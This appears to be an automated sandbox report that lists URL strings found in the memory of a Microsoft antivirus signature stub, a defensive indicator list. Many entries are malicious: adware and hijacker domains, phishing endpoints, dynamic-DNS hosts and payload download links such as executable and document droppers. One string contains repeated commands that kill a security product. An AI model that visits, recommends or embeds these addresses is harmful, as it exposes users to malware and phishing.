Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://www.djapp.info/?domain=xa
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.dk-soft.org
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: http://www.dosearches.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://www.doswf.com
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: http://www.dsdsd.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/_poplkh
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/canview.txt
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/xh
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/count/updatedata.aspx?id=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/cgi-bin/free2.cgi__asf_license_url_ends_here__
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/exit/movies1.html__
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/exit/music
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://www.easypoint.kr/cashback/config.php
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.php
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.phpx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.efixpctools.com
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.egy8.com
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.egy8.comx
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://www.eomniform.com/OF5/nsplugins/OFMailX.cab
Source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp String found in binary or memory: http://www.epoolsoft.com/pchunter/x
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://www.ewrtw.pw/c/niubilityc.exe
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://www.eyuyan.com)
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: http://www.f2ko.de
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://www.facebookikiziniz.com/ext/r.php
Source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com/affiliates/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com/affiliates/772465/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://www.fbcom.review/d/10.doc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.fbi.gov/index.htm
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://www.fenomen-games.com/dhome.htm
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://www.fenomen-games.com/dhome.htmxM
Source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txt
Source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txtxN
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.flashempire.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.flashkin.net
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://www.friskypotato.com/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.friskypotato.com/codec/mp3/activecod3
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.funxy.biz/freevideos/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.fyedit.cn/MainDll/SoftSize.asp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.fyedit.cn/MainDll/SoftSize.aspFind
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.fyhappy.cn/MainDll/SoftSize.asp
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.fyhappy.cn/MainDll/SoftSize.aspFind
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://www.getpricefinder.com/
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.getsav-in.compublisheradpeak
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: http://www.gnu.org/licenses/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://www.go2000.com/?4
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://www.go2000.com/?4aM
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.goodtimesplayer.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?hl=zh-CN&q=
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrerMicrosoft
Source: MpSigStub.exe, 0000000B.00000003.18225498885.0000021B4EEFC000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrercookienode.appendChild()
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://www.gorillawalker.com
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp String found in binary or memory: http://www.greenpartnership.jp
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.guzzotorino.it/ups-ship-notification
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: http://www.hao123.com/?tn=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.haosoft.net/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://www.hjsdffsfs.aonecommercial.com
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://www.hljcm.com/c
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.hohosearch.com/?ts=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.hotbar.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.hotdutchporn.net/cb/scripts/getAddressFromIP.php?wmid=
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://www.hustler-exclusive.com/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://www.hxlive.cn
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.i-cash.de/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.iask.com/s?k=%s
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.icbc.com.cn/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.iciba.com/search?s=%s
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.imobile.com.cn/
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://www.inet4you.com/exit/
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://www.infoaxe.com/enhancedsearchform.jsp
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://www.infotraffik-01.space/?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.installmonetizer.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.instantmp3player.com
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/idcard.php?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/ip.php?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/mobile.php?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.ip.com.cn/tel.php?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: http://www.ip138.com
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: http://www.ip138.comx
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://www.ip2location.com/
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://www.istartsurf.com
Source: MpSigStub.exe, 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp String found in binary or memory: http://www.j.mp/
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp String found in binary or memory: http://www.jajaan.com/ip.asp
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://www.jesuser.cn/plug/doSelect.asp?CMD=%s
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.joyo.com/
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinexl
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.jsonrpc.org/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.jword.jp/
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://www.kerstingutleder.at//p.o/next.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.key-logger.ws
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: http://www.kryogenix.org/code/browser/sorttable/
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp String found in binary or memory: http://www.kssoftware.ch
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://www.linkinc.es/scss/water.php
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://www.lis.eu
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://www.livecare.net/x
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.lollipop-network.com/privacy.php?lg=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/cgi
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.look2me.com/products/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.lop.com/search/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.lop.com/search/xa
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.luckbird8.cn/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.lwstats.com/11/
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://www.macadwarecleaner.com
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp String found in binary or memory: http://www.macromedia.com/go/getflashplayer
Source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp String found in binary or memory: http://www.maliciousurl-695dba18-2bb9-429a-a9a6-fe89a0eb945e.com/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://www.maxwebsearch.com/s?i_
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://www.mediabusnetwork.com/phandler.php?pid=
Source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: http://www.mediafire.com/download/
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://www.megafileupload.com/
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://www.megasesso.ittaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.menkee.info/wma.php
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.mickyfastdl.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.microname.co.kr
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://www.mmviewer.com
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://www.mmviewer.com/post/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.monitoreatufamilia.com
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://www.mootolola.com/
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://www.more4apps.com/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.info
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.info/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://www.mp3codec.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?pc=MSERT1
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://www.mvps.org/vb
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.my123.com/
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp String found in binary or memory: http://www.myarmory.com/search/?Keywords=
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: http://www.mybrowserbar.com/cgi/coupons.cgi/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.mydreamworld.50webs.com
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp String found in binary or memory: http://www.myfiledistribution.com/mfd.php
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.myyiso.com/internet/
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://www.nab.com.au
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://www.navegaki.com/?bd=sc&oem=cube&uid=maxtorxstm3250310as_6ry4hzd9xxxx6ry4hzd9&version=2.3.0.8
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.navexcel.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.navexcel.com/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://www.navsmart.info
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.navsmart.info/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.netfe.org/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.netxboy.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.netxboy.com/x
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.nirsoft.net/utils/product_cd_key_viewer.html
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: http://www.niudoudou.com/web/download/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.now.cn/?SCPMCID=
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.ntdlzone.com/download.php?
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://www.ntdlzone.com/download.php?xV
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://www.nubileones.com/members/
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp String found in binary or memory: http://www.nuevaq.fm
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://www.omniboxes.com/?type=sc&ts=1425313275&from=amt&uid=sandiskxsdssdhp256g_132567401149
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.onlinedown.net/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://www.onmylike.com/?utm_source=
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://www.oursurfing.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.p2ptips.com/cgi-bin/kpop3.pl
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.papaping.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.paqtool.com/product/keylog/keylog_
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://www.paran-welfare.org/dokumente/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.pc-fix-booster.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.pc-fix-cleaner.com/
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://www.pcbooster.com
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://www.pclady.com.cn/
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://www.pcpurifier.com/buynow/?
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://ahtaeereddit.org
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://ajcbhjehkbf.25u.com/rom/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://ajdepehlisale.gb.net/document.php
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://allcityroofers.com/wp-admin/spf/hnr/tap.php
Source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%s
Source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%sxe
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://alwaslapps.com/attachment/attach.php
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp String found in binary or memory: https://am.localstormwatch00.localstormwQj
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: https://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: https://anonfiles.com/
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: https://anspa.dyndns.dk/dr1/next.php
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://aouscchakwal.000webhostapp.com/hot.phpmethod=
Source: MpSigStub.exe, 0000000B.00000003.18280386458.0000021B5DDC2000.00000004.00000001.sdmp String found in binary or memory: https://api.edgelauncher.com
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://api.github.com
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://api.l33tsite.info/lib/
Source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp String found in binary or memory: https://api.tdameritrade.com/v1/accounts
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://appengine.google.com/_ah/logout?continue=http
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://apps-newsorders.servehttp.com/_
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://apps-nosmile.servehttp.com/_
